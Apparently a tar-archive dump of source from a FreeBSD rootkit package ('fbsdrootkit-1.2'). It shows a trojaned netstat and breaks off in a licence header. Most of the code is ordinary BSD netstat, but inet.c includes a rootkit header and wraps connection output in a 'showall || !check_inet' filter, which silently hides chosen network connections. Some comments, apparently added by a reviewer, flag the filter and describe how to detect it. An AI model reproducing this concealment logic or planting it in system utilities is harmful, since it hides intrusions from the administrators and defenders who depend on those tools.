ifnet; union { struct ifaddr ifa; struct in_ifaddr in; struct ns_ifaddr ns; struct iso_ifaddr iso; } ifaddr; u_long ifaddraddr; struct sockaddr *sa; char name[32], tname[16]; if (ifnetaddr == 0) { printf("ifnet: symbol not defined\n"); return; } if (interval) { sidewaysintpr((unsigned)interval, ifnetaddr); return; } if (kread(ifnetaddr, (char *)&ifnetaddr, sizeof ifnetaddr)) return; printf("%-5.5s %-5.5s %-13.13s %-15.15s %8.8s %5.5s", "Name", "Mtu", "Network", "Address", "Ipkts", "Ierrs"); if (bflag) printf(" %10.10s","Ibytes"); printf(" %8.8s %5.5s", "Opkts", "Oerrs"); if (bflag) printf(" %10.10s","Obytes"); printf(" %5s", "Coll"); if (tflag) printf(" %s", "Time"); if (dflag) printf(" %s", "Drop"); putchar('\n'); ifaddraddr = 0; while (ifnetaddr || ifaddraddr) { struct sockaddr_in *sin; register char *cp; int n, m; if (ifaddraddr == 0) { if (kread(ifnetaddr, (char *)&ifnet, sizeof ifnet) || kread((u_long)ifnet.if_name, tname, 16)) return; tname[15] = '\0'; 
ifnetaddr = (u_long)ifnet.if_next; snprintf(name, 32, "%s%d", tname, ifnet.if_unit); if (interface != 0 && (strcmp(name, interface) != 0)) continue; cp = index(name, '\0'); if ((ifnet.if_flags&IFF_UP) == 0) *cp++ = '*'; *cp = '\0'; ifaddraddr = (u_long)ifnet.if_addrlist; } printf("%-5.5s %-5d ", name, ifnet.if_mtu); if (ifaddraddr == 0) { printf("%-13.13s ", "none"); printf("%-15.15s ", "none"); } else { if (kread(ifaddraddr, (char *)&ifaddr, sizeof ifaddr)) { ifaddraddr = 0; continue; } #define CP(x) ((char *)(x)) cp = (CP(ifaddr.ifa.ifa_addr) - CP(ifaddraddr)) + CP(&ifaddr); sa = (struct sockaddr *)cp; switch (sa->sa_family) { case AF_UNSPEC: printf("%-13.13s ", "none"); printf("%-15.15s ", "none"); break; case AF_INET: sin = (struct sockaddr_in *)sa; #ifdef notdef /* can't use inet_makeaddr because kernel * keeps nets unshifted. */ in = inet_makeaddr(ifaddr.in.ia_subnet, INADDR_ANY); printf("%-13.13s ", netname(in.s_addr, ifaddr.in.ia_subnetmask)); #else printf("%-13.13s ", netname(htonl(ifaddr.in.ia_subnet), ifaddr.in.ia_subnetmask)); #endif printf("%-15.15s ", routename(sin->sin_addr.s_addr)); break; case AF_NS: { struct sockaddr_ns *sns = (struct sockaddr_ns *)sa; u_long net; char netnum[8]; *(union ns_net *) &net = sns->sns_addr.x_net; sprintf(netnum, "%lxH", ntohl(net)); upHex(netnum); printf("ns:%-10s ", netnum); printf("%-15s ", ns_phost((struct sockaddr *)sns)); } break; case AF_LINK: { struct sockaddr_dl *sdl = (struct sockaddr_dl *)sa; cp = (char *)LLADDR(sdl); n = sdl->sdl_alen; } m = printf(""); goto hexprint; default: m = printf("(%d)", sa->sa_family); for (cp = sa->sa_len + (char *)sa; --cp > sa->sa_data && (*cp == 0);) {} n = cp - sa->sa_data + 1; cp = sa->sa_data; hexprint: while (--n >= 0) m += printf("%02x%c", *cp++ & 0xff, n > 0 ? '.' 
: ' '); m = 30 - m; while (m-- > 0) putchar(' '); break; } ifaddraddr = (u_long)ifaddr.ifa.ifa_next; } printf("%8d %5d ", ifnet.if_ipackets, ifnet.if_ierrors); if (bflag) printf("%10d ", ifnet.if_ibytes); printf("%8d %5d ", ifnet.if_opackets, ifnet.if_oerrors); if (bflag) printf("%10d ", ifnet.if_obytes); printf("%5d", ifnet.if_collisions); if (tflag) printf(" %3d", ifnet.if_timer); if (dflag) printf(" %3d", ifnet.if_snd.ifq_drops); putchar('\n'); } } #define MAXIF 10 struct iftot { char ift_name[16]; /* interface name */ u_int ift_ip; /* input packets */ u_int ift_ie; /* input errors */ u_int ift_op; /* output packets */ u_int ift_oe; /* output errors */ u_int ift_co; /* collisions */ u_int ift_dr; /* drops */ u_int ift_ib; /* input bytes */ u_int ift_ob; /* output bytes */ } iftot[MAXIF]; u_char signalled; /* set if alarm goes off "early" */ /* * Print a running summary of interface statistics. * Repeat display every interval seconds, showing statistics * collected over that interval. Assumes that interval is non-zero. * First line printed at top of screen is always cumulative. 
*/ static void sidewaysintpr(interval, off) unsigned interval; u_long off; { struct ifnet ifnet; u_long firstifnet; register struct iftot *ip, *total; register int line; struct iftot *lastif, *sum, *interesting; int oldmask, first; u_long interesting_off; if (kread(off, (char *)&firstifnet, sizeof (u_long))) return; lastif = iftot; sum = iftot + MAXIF - 1; total = sum - 1; interesting = NULL; interesting_off = 0; for (off = firstifnet, ip = iftot; off;) { char *cp; char name[16], tname[16]; if (kread(off, (char *)&ifnet, sizeof ifnet)) break; if (kread((u_long)ifnet.if_name, tname, 16)) break; tname[15] = '\0'; snprintf(name, 16, "%s%d", tname, ifnet.if_unit); if (interface && strcmp(name, interface) == 0) { interesting = ip; interesting_off = off; } snprintf(ip->ift_name, 16, "(%s)", name);; ip++; if (ip >= iftot + MAXIF - 2) break; off = (u_long) ifnet.if_next; } lastif = ip; (void)signal(SIGALRM, catchalarm); signalled = NO; (void)alarm(interval); for (ip = iftot; ip < iftot + MAXIF; ip++) { ip->ift_ip = 0; ip->ift_ie = 0; ip->ift_ib = 0; ip->ift_op = 0; ip->ift_oe = 0; ip->ift_ob = 0; ip->ift_co = 0; ip->ift_dr = 0; } first = 1; banner: printf("%17s %14s %16s", "input", interesting ? 
interesting->ift_name : "(Total)", "output"); putchar('\n'); printf("%10s %5s %10s %10s %5s %10s %5s", "packets", "errs", "bytes", "packets", "errs", "bytes", "colls"); if (dflag) printf(" %5.5s", "drops"); putchar('\n'); fflush(stdout); line = 0; loop: if (interesting != NULL) { ip = interesting; if (kread(interesting_off, (char *)&ifnet, sizeof ifnet)) { printf("???\n"); exit(1); }; if (!first) { printf("%10u %5u %10u %10u %5u %10u %5u", ifnet.if_ipackets - ip->ift_ip, ifnet.if_ierrors - ip->ift_ie, ifnet.if_ibytes - ip->ift_ib, ifnet.if_opackets - ip->ift_op, ifnet.if_oerrors - ip->ift_oe, ifnet.if_obytes - ip->ift_ob, ifnet.if_collisions - ip->ift_co); if (dflag) printf(" %5u", ifnet.if_snd.ifq_drops - ip->ift_dr); } ip->ift_ip = ifnet.if_ipackets; ip->ift_ie = ifnet.if_ierrors; ip->ift_ib = ifnet.if_ibytes; ip->ift_op = ifnet.if_opackets; ip->ift_oe = ifnet.if_oerrors; ip->ift_ob = ifnet.if_obytes; ip->ift_co = ifnet.if_collisions; ip->ift_dr = ifnet.if_snd.ifq_drops; } else { sum->ift_ip = 0; sum->ift_ie = 0; sum->ift_ib = 0; sum->ift_op = 0; sum->ift_oe = 0; sum->ift_ob = 0; sum->ift_co = 0; sum->ift_dr = 0; for (off = firstifnet, ip = iftot; off && ip < lastif; ip++) { if (kread(off, (char *)&ifnet, sizeof ifnet)) { off = 0; continue; } sum->ift_ip += ifnet.if_ipackets; sum->ift_ie += ifnet.if_ierrors; sum->ift_ib += ifnet.if_ibytes; sum->ift_op += ifnet.if_opackets; sum->ift_oe += ifnet.if_oerrors; sum->ift_ob += ifnet.if_obytes; sum->ift_co += ifnet.if_collisions; sum->ift_dr += ifnet.if_snd.ifq_drops; off = (u_long) ifnet.if_next; } if (!first) { printf("%10u %5u %10u %10u %5u %10u %5u", sum->ift_ip - total->ift_ip, sum->ift_ie - total->ift_ie, sum->ift_ib - total->ift_ib, sum->ift_op - total->ift_op, sum->ift_oe - total->ift_oe, sum->ift_ob - total->ift_ob, sum->ift_co - total->ift_co); if (dflag) printf(" %5u", sum->ift_dr - total->ift_dr); } *total = *sum; } if (!first) putchar('\n'); fflush(stdout); oldmask = sigblock(sigmask(SIGALRM)); if (! 
signalled) { sigpause(0); } sigsetmask(oldmask); signalled = NO; (void)alarm(interval); line++; first = 0; if (line == 21) goto banner; else goto loop; /*NOTREACHED*/ } /* * Called if an interval expires before sidewaysintpr has completed a loop. * Sets a flag to not wait for the alarm. */ static void catchalarm(signo) int signo; { signalled = YES; } fbsdrootkit-1.2/netstat/inet.c100600 764 0 40030 6257601665 14263 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)inet.c 8.5 (Berkeley) 5/24/95"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define TCPSTATES #include #include #include #include #include #include #include #include #include #include #include #include "netstat.h" /* Rootkit configuration files */ #include "../config.h" #define INET_DOT_C #include "../rootkitnetstat.h" struct inpcb inpcb; struct tcpcb tcpcb; struct socket sockb; char *inetname __P((struct in_addr *)); void inetprint __P((struct in_addr *, int, char *, int)); /* * Print a summary of connections related to an Internet * protocol. For TCP, also give state of connection. * Listening processes (aflag) are suppressed unless the * -a (all) flag is specified. 
*/
/*
 * off  - kernel address of the protocol's PCB list head; 0 means the symbol
 *        was not found and nothing is printed.
 * name - protocol name used in the "Proto" column; "tcp" additionally
 *        enables the per-connection state column.
 *
 * NOTE(review): this copy is not a faithful netstat.  The row-printing code
 * is wrapped in `showall || !check_inet(inpcb)`; neither name is defined in
 * this file, so both presumably come from "../rootkitnetstat.h", which this
 * file includes.  Any connection for which check_inet() returns non-zero is
 * silently left out of the table.  Output from a binary built from this
 * source is therefore not evidence that a connection is absent: cross-check
 * with a known-good binary or an off-host view (firewall or flow logs, a
 * packet capture), and verify system binaries against a trusted hash
 * baseline.
 */
void
protopr(off, name)
	u_long off;
	char *name;
{
	struct inpcbhead head;
	register struct inpcb *prev, *next;
	int istcp;
	static int first = 1;	/* header is printed once per program run */

	if (off == 0)
		return;
	istcp = strcmp(name, "tcp") == 0;
	/* NOTE(review): return value ignored; on failure head is uninitialised */
	kread(off, (char *)&head, sizeof (struct inpcbhead));
	prev = (struct inpcb *)off;	/* assigned here and below, never read */

	/* Walk the kernel list, copying each PCB into the file-scope inpcb. */
	for (next = head.lh_first; next != NULL; next = inpcb.inp_list.le_next) {
		if (kread((u_long)next, (char *)&inpcb, sizeof (inpcb))) {
			printf("???\n");
			break;
		}
		/* without -a, skip sockets bound to the wildcard local address */
		if (!aflag &&
		    inet_lnaof(inpcb.inp_laddr) == INADDR_ANY) {
			prev = next;
			continue;
		}
		if (kread((u_long)inpcb.inp_socket, (char *)&sockb, sizeof (sockb))) {
			printf("???\n");
			break;
		};
		if (istcp) {
			if (kread((u_long)inpcb.inp_ppcb,
			    (char *)&tcpcb, sizeof (tcpcb))) {
				printf("???\n");
				break;
			};
		}
		if (first) {
			printf("Active Internet connections");
			if (aflag)
				printf(" (including servers)");
			putchar('\n');
			if (Aflag)
				printf("%-8.8s ", "PCB");
			printf(Aflag ?
				"%-5.5s %-6.6s %-6.6s  %-18.18s %-18.18s %s\n" :
				"%-5.5s %-6.6s %-6.6s  %-22.22s %-22.22s %s\n",
				"Proto", "Recv-Q", "Send-Q",
				"Local Address", "Foreign Address", "(state)");
			first = 0;
		}
		/*
		 * Filter added by the rootkit: the row is printed only when
		 * showall is set or check_inet() returns 0 for this PCB.
		 * Everything inside this block is the normal row output.
		 */
		if(showall || !check_inet(inpcb)) {
			if (Aflag)
				if (istcp)
					/* NOTE(review): pointer narrowed to int for printing */
					printf("%8x ", (int)inpcb.inp_ppcb);
				else
					printf("%8x ", (int)next);
			printf("%-5.5s %6ld %6ld ", name, sockb.so_rcv.sb_cc,
				sockb.so_snd.sb_cc);
			if (nflag) {
				inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport,
				    name, 1);
				inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport,
				    name, 1);
			} else {
				inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport,
				    name, 0);
				/* foreign port stays numeric when it differs from the local port */
				inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport,
				    name, inpcb.inp_lport != inpcb.inp_fport);
			}
			if (istcp) {
				/* out-of-range state is printed as a number, not looked up */
				if (tcpcb.t_state < 0 || tcpcb.t_state >= TCP_NSTATES)
					printf(" %d", tcpcb.t_state);
				else {
					printf(" %s", tcpstates[tcpcb.t_state]);
#if defined(TF_NEEDSYN) && defined(TF_NEEDFIN)
					/* Show T/TCP `hidden state' */
					if (tcpcb.t_flags & (TF_NEEDSYN|TF_NEEDFIN))
						putchar('*');
#endif /* defined(TF_NEEDSYN) && defined(TF_NEEDFIN) */
				}
			}
			putchar('\n');
		}
		prev = next;
	}
}

/*
 * Dump TCP statistics structure.
 *
 * off  - kernel address of the tcpstat structure; 0 prints nothing.
 * name - heading printed before the counters.
 *
 * Each p()/p2() line prints its counter(s) only when non-zero, unless
 * sflag <= 1, in which case every line is printed.
 */
void
tcp_stats(off, name)
	u_long off;
	char *name;
{
	struct tcpstat tcpstat;

	if (off == 0)
		return;
	printf ("%s:\n", name);
	/* NOTE(review): return value ignored; on failure the counters are uninitialised */
	kread(off, (char *)&tcpstat, sizeof (tcpstat));

	/* p: one counter with an "s" plural; p2: two counters; p3: "es" plural (unused below) */
#define	p(f, m) if (tcpstat.f || sflag <= 1) \
    printf(m, tcpstat.f, plural(tcpstat.f))
#define	p2(f1, f2, m) if (tcpstat.f1 || tcpstat.f2 || sflag <= 1) \
    printf(m, tcpstat.f1, plural(tcpstat.f1), tcpstat.f2, plural(tcpstat.f2))
#define	p3(f, m) if (tcpstat.f || sflag <= 1) \
    printf(m, tcpstat.f, plurales(tcpstat.f))

	p(tcps_sndtotal, "\t%ld packet%s sent\n");
	p2(tcps_sndpack,tcps_sndbyte,
		"\t\t%ld data packet%s (%ld byte%s)\n");
	p2(tcps_sndrexmitpack, tcps_sndrexmitbyte,
		"\t\t%ld data packet%s (%ld byte%s) retransmitted\n");
	/* Why are these here in the first place? */
	/* p(tcps_mturesent, "\t\t%ld resend%s initiated by MTU discovery\n"); */
	p2(tcps_sndacks, tcps_delack,
		"\t\t%ld ack-only packet%s (%ld delayed)\n");
	p(tcps_sndurg, "\t\t%ld URG only packet%s\n");
	p(tcps_sndprobe, "\t\t%ld window probe packet%s\n");
	p(tcps_sndwinup, "\t\t%ld window update packet%s\n");
	p(tcps_sndctrl, "\t\t%ld control packet%s\n");
	p(tcps_rcvtotal, "\t%ld packet%s received\n");
	p2(tcps_rcvackpack, tcps_rcvackbyte, "\t\t%ld ack%s (for %ld byte%s)\n");
	p(tcps_rcvdupack, "\t\t%ld duplicate ack%s\n");
	p(tcps_rcvacktoomuch, "\t\t%ld ack%s for unsent data\n");
	p2(tcps_rcvpack, tcps_rcvbyte,
		"\t\t%ld packet%s (%ld byte%s) received in-sequence\n");
	p2(tcps_rcvduppack, tcps_rcvdupbyte,
		"\t\t%ld completely duplicate packet%s (%ld byte%s)\n");
	p(tcps_pawsdrop, "\t\t%ld old duplicate packet%s\n");
	p2(tcps_rcvpartduppack, tcps_rcvpartdupbyte,
		"\t\t%ld packet%s with some dup. data (%ld byte%s duped)\n");
	p2(tcps_rcvoopack, tcps_rcvoobyte,
		"\t\t%ld out-of-order packet%s (%ld byte%s)\n");
	p2(tcps_rcvpackafterwin, tcps_rcvbyteafterwin,
		"\t\t%ld packet%s (%ld byte%s) of data after window\n");
	p(tcps_rcvwinprobe, "\t\t%ld window probe%s\n");
	p(tcps_rcvwinupd, "\t\t%ld window update packet%s\n");
	p(tcps_rcvafterclose, "\t\t%ld packet%s received after close\n");
	p(tcps_rcvbadsum, "\t\t%ld discarded for bad checksum%s\n");
	p(tcps_rcvbadoff, "\t\t%ld discarded for bad header offset field%s\n");
	p(tcps_rcvshort, "\t\t%ld discarded because packet too short\n");
	p(tcps_connattempt, "\t%ld connection request%s\n");
	p(tcps_accepts, "\t%ld connection accept%s\n");
	/* Ditto */
	/* p(tcps_badsyn, "\t%ld bad connection attempt%s\n"); */
	/* p(tcps_listendrop, "\t%ld listen queue overflow%s\n"); */
	p(tcps_connects, "\t%ld connection%s established (including accepts)\n");
	p2(tcps_closed, tcps_drops,
		"\t%ld connection%s closed (including %ld drop%s)\n");
	p(tcps_cachedrtt, "\t\t%ld connection%s updated cached RTT on close\n");
	p(tcps_cachedrttvar,
	  "\t\t%ld connection%s updated cached RTT variance on close\n");
	p(tcps_cachedssthresh,
	  "\t\t%ld connection%s updated cached ssthresh on close\n");
	p(tcps_conndrops, "\t%ld embryonic connection%s dropped\n");
	p2(tcps_rttupdated, tcps_segstimed,
		"\t%ld segment%s updated rtt (of %ld attempt%s)\n");
	p(tcps_rexmttimeo, "\t%ld retransmit timeout%s\n");
	p(tcps_timeoutdrop, "\t\t%ld connection%s dropped by rexmit timeout\n");
	p(tcps_persisttimeo, "\t%ld persist timeout%s\n");
	p(tcps_persistdrop, "\t\t%ld connection%s dropped by persist timeout\n");
	p(tcps_keeptimeo, "\t%ld keepalive timeout%s\n");
	p(tcps_keepprobe, "\t\t%ld keepalive probe%s sent\n");
	p(tcps_keepdrops, "\t\t%ld connection%s dropped by keepalive\n");
	p(tcps_predack, "\t%ld correct ACK header prediction%s\n");
	p(tcps_preddat, "\t%ld correct data packet header prediction%s\n");
#undef p
#undef p2
#undef p3
}

/*
 * Dump UDP statistics structure.
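*/
/*
 * off  - kernel address of the udpstat structure; 0 prints nothing.
 * name - heading printed before the counters.
 *
 * Each p() line prints its counter only when non-zero, unless sflag <= 1,
 * in which case every line is printed.
 */
void
udp_stats(off, name)
	u_long off;
	char *name;
{
	struct udpstat udpstat;
	u_long delivered;

	if (off == 0)
		return;
	/*
	 * kread() returns non-zero on failure (see its other callers in this
	 * package).  Bail out rather than print counters from an uninitialised
	 * structure.
	 */
	if (kread(off, (char *)&udpstat, sizeof (udpstat)))
		return;
	printf("%s:\n", name);

	/*
	 * Formats without a %s still receive the plural() argument; printf
	 * ignores the surplus argument.
	 */
#define	p(f, m) if (udpstat.f || sflag <= 1) \
    printf(m, udpstat.f, plural(udpstat.f))
	p(udps_ipackets, "\t%lu datagram%s received\n");
	p(udps_hdrops, "\t%lu with incomplete header\n");
	p(udps_badlen, "\t%lu with bad data length field\n");
	p(udps_badsum, "\t%lu with bad checksum\n");
	p(udps_noport, "\t%lu dropped due to no socket\n");
	p(udps_noportbcast,
	    "\t%lu broadcast/multicast datagram%s dropped due to no socket\n");
	p(udps_fullsock, "\t%lu dropped due to full socket buffers\n");
	/* ??? */
	/* p(udpps_pcbhashmiss, "\t%lu not for hashed pcb\n"); */

	/*
	 * Received minus every drop reason.  The arithmetic is unsigned, so
	 * inconsistent counters would wrap to a very large value rather than
	 * go negative.
	 */
	delivered = udpstat.udps_ipackets -
		    udpstat.udps_hdrops -
		    udpstat.udps_badlen -
		    udpstat.udps_badsum -
		    udpstat.udps_noport -
		    udpstat.udps_noportbcast -
		    udpstat.udps_fullsock;
	if (delivered || sflag <= 1)
		printf("\t%lu delivered\n", delivered);
	p(udps_opackets, "\t%lu datagram%s output\n");
#undef p
}

/*
 * Dump IP statistics structure.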
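*/
/*
 * off  - kernel address of the ipstat structure; 0 prints nothing.
 * name - heading printed before the counters.
 *
 * Each p() line prints its counter only when non-zero, unless sflag <= 1.
 */
void
ip_stats(off, name)
	u_long off;
	char *name;
{
	struct ipstat ipstat;

	if (off == 0)
		return;
	/*
	 * kread() returns non-zero on failure (see its other callers in this
	 * package); do not print counters from an uninitialised structure.
	 */
	if (kread(off, (char *)&ipstat, sizeof (ipstat)))
		return;
	printf("%s:\n", name);

#define	p(f, m) if (ipstat.f || sflag <= 1) \
    printf(m, ipstat.f, plural(ipstat.f))

	p(ips_total, "\t%lu total packet%s received\n");
	p(ips_badsum, "\t%lu bad header checksum%s\n");
	p(ips_toosmall, "\t%lu with size smaller than minimum\n");
	p(ips_tooshort, "\t%lu with data size < data length\n");
	p(ips_badhlen, "\t%lu with header length < data size\n");
	p(ips_badlen, "\t%lu with data length < header length\n");
	p(ips_badoptions, "\t%lu with bad options\n");
	p(ips_badvers, "\t%lu with incorrect version number\n");
	p(ips_fragments, "\t%lu fragment%s received\n");
	p(ips_fragdropped, "\t%lu fragment%s dropped (dup or out of space)\n");
	p(ips_fragtimeout, "\t%lu fragment%s dropped after timeout\n");
	p(ips_reassembled, "\t%lu packet%s reassembled ok\n");
	p(ips_delivered, "\t%lu packet%s for this host\n");
	p(ips_noproto, "\t%lu packet%s for unknown/unsupported protocol\n");
	p(ips_forward, "\t%lu packet%s forwarded\n");
	p(ips_cantforward, "\t%lu packet%s not forwardable\n");
	p(ips_redirectsent, "\t%lu redirect%s sent\n");
	p(ips_localout, "\t%lu packet%s sent from this host\n");
	p(ips_rawout, "\t%lu packet%s sent with fabricated ip header\n");
	p(ips_odropped, "\t%lu output packet%s dropped due to no bufs, etc.\n");
	p(ips_noroute, "\t%lu output packet%s discarded due to no route\n");
	p(ips_fragmented, "\t%lu output datagram%s fragmented\n");
	p(ips_ofragments, "\t%lu fragment%s created\n");
	p(ips_cantfrag, "\t%lu datagram%s that can't be fragmented\n");
#undef p
}

/*
 * Display names for ICMP message types, indexed by type number.  The table
 * has 19 entries (types 0..18).
 */
static	char *icmpnames[] = {
	"echo reply",
	"#1",
	"#2",
	"destination unreachable",
	"source quench",
	"routing redirect",
	"#6",
	"#7",
	"echo",
	"router advertisement",
	"router solicitation",
	"time exceeded",
	"parameter problem",
	"time stamp",
	"time stamp reply",
	"information request",
	"information request reply",
	"address mask request",
	"address mask reply",
};

/*
 * Dump ICMP statistics.
 *
 * off  - kernel address of the icmpstat structure; 0 prints nothing.
 * name - heading printed before the counters.
 *
 * The two histograms list only message types with a non-zero count, and
 * each histogram heading appears only if at least one type is listed.
 */
void
icmp_stats(off, name)
	u_long off;
	char *name;
{
	struct icmpstat icmpstat;
	register int i, first;

	if (off == 0)
		return;
	/* kread() returns non-zero on failure; skip the dump in that case */
	if (kread(off, (char *)&icmpstat, sizeof (icmpstat)))
		return;
	printf("%s:\n", name);

#define	p(f, m) if (icmpstat.f || sflag <= 1) \
    printf(m, icmpstat.f, plural(icmpstat.f))

	p(icps_error, "\t%lu call%s to icmp_error\n");
	p(icps_oldicmp,
	    "\t%lu error%s not generated 'cuz old message was icmp\n");
	/*
	 * NOTE(review): icmpnames[i] is indexed up to ICMP_MAXTYPE; this
	 * assumes ICMP_MAXTYPE <= 18 so the index stays inside the table --
	 * confirm against the system header.
	 */
	for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++)
		if (icmpstat.icps_outhist[i] != 0) {
			if (first) {
				printf("\tOutput histogram:\n");
				first = 0;
			}
			printf("\t\t%s: %lu\n", icmpnames[i],
				icmpstat.icps_outhist[i]);
		}
	p(icps_badcode, "\t%lu message%s with bad code fields\n");
	p(icps_tooshort, "\t%lu message%s < minimum length\n");
	p(icps_checksum, "\t%lu bad checksum%s\n");
	p(icps_badlen, "\t%lu message%s with bad length\n");
	for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++)
		if (icmpstat.icps_inhist[i] != 0) {
			if (first) {
				printf("\tInput histogram:\n");
				first = 0;
			}
			printf("\t\t%s: %lu\n", icmpnames[i],
				icmpstat.icps_inhist[i]);
		}
	p(icps_reflect, "\t%lu message response%s generated\n");
#undef p
}

/*
 * Dump IGMP statistics structure.
 *
 * off  - kernel address of the igmpstat structure; 0 prints nothing.
 * name - heading printed before the counters.
 */
void
igmp_stats(off, name)
	u_long off;
	char *name;
{
	struct igmpstat igmpstat;

	if (off == 0)
		return;
	/* kread() returns non-zero on failure; skip the dump in that case */
	if (kread(off, (char *)&igmpstat, sizeof (igmpstat)))
		return;
	printf("%s:\n", name);

	/* p: "s" plural; py: "y"/"ies" plural (for "query"/"queries") */
#define	p(f, m) if (igmpstat.f || sflag <= 1) \
    printf(m, igmpstat.f, plural(igmpstat.f))
#define	py(f, m) if (igmpstat.f || sflag <= 1) \
    printf(m, igmpstat.f, igmpstat.f != 1 ? "ies" : "y")
	p(igps_rcv_total, "\t%u message%s received\n");
	p(igps_rcv_tooshort, "\t%u message%s received with too few bytes\n");
	p(igps_rcv_badsum, "\t%u message%s received with bad checksum\n");
	py(igps_rcv_queries, "\t%u membership quer%s received\n");
	py(igps_rcv_badqueries, "\t%u membership quer%s received with invalid field(s)\n");
	p(igps_rcv_reports, "\t%u membership report%s received\n");
	p(igps_rcv_badreports, "\t%u membership report%s received with invalid field(s)\n");
	p(igps_rcv_ourreports, "\t%u membership report%s received for groups to which we belong\n");
	p(igps_snd_reports, "\t%u membership report%s sent\n");
#undef p
#undef py
}

/*
 * Pretty print an Internet address (net address + port).
 *
 * in      - address to print; passed to inetname().
 * port    - port as stored in the PCB; converted with ntohs() when printed
 *           as a number.
 * proto   - protocol name handed to getservbyport().
 * numeric - non-zero suppresses the service-name lookup.
 *
 * Both writes into line[] are bounded by a precision in the format
 * (at most 16 characters plus '.', then at most 15), so they fit in 80
 * bytes.  The printed field is 18 columns wide with Aflag, 22 otherwise.
 */
void
inetprint(in, port, proto,numeric)
	register struct in_addr *in;
	int port;
	char *proto;
	int numeric;
{
	struct servent *sp = 0;
	char line[80], *cp;
	int width;

	sprintf(line, "%.*s.", (Aflag && !numeric) ? 12 : 16, inetname(in));
	cp = index(line, '\0');
	if (!numeric && port)
		sp = getservbyport((int)port, proto);
	/* port 0 prints as "*"; an unknown service falls back to the number */
	if (sp || port == 0)
		sprintf(cp, "%.15s", sp ? sp->s_name : "*");
	else
		sprintf(cp, "%d", ntohs((u_short)port));
	width = Aflag ? 18 : 22;
	printf(" %-*.*s", width, width, line);
}

/*
 * Construct an Internet address representation.
 * If the nflag has been supplied, give
 * numeric value, otherwise try for symbolic name.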
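 */
/*
 * inp - address to format.  NOTE(review): on the numeric path the
 *       address is converted to host byte order in place, so the caller's
 *       copy is modified.
 *
 * Returns a pointer to a static buffer that the next call overwrites.
 */
char *
inetname(inp)
	struct in_addr *inp;
{
	register char *cp;
	static char line[50];
	struct hostent *hp;
	struct netent *np;

	cp = 0;
	if (!nflag && inp->s_addr != INADDR_ANY) {
		int net = inet_netof(*inp);
		int lna = inet_lnaof(*inp);

		/* A zero host part is looked up as a network name first. */
		if (lna == INADDR_ANY) {
			np = getnetbyaddr(net, AF_INET);
			if (np)
				cp = np->n_name;
		}
		if (cp == 0) {
			hp = gethostbyaddr((char *)inp, sizeof (*inp), AF_INET);
			if (hp) {
				cp = hp->h_name;
				trimdomain(cp);
			}
		}
	}
	if (inp->s_addr == INADDR_ANY)
		strcpy(line, "*");
	else if (cp)
		/*
		 * cp comes from the resolver (reverse DNS or the networks
		 * database), i.e. from whoever controls that data, and can be
		 * longer than line[].  Bound the copy; an over-long name is
		 * truncated.
		 */
		snprintf(line, sizeof(line), "%s", cp);
	else {
		inp->s_addr = ntohl(inp->s_addr);
#define C(x)	((x) & 0xff)
		/* The casts keep the arguments matched to %lu on every ABI. */
		snprintf(line, sizeof(line), "%lu.%lu.%lu.%lu",
		    (u_long)C(inp->s_addr >> 24),
		    (u_long)C(inp->s_addr >> 16),
		    (u_long)C(inp->s_addr >> 8),
		    (u_long)C(inp->s_addr));
	}
	return (line);
}
fbsdrootkit-1.2/netstat/iso.c100600 764 0 57022 6155205223 14112 0ustar dfroot/*
 * Copyright (c) 1983, 1988, 1993
 *	The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.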
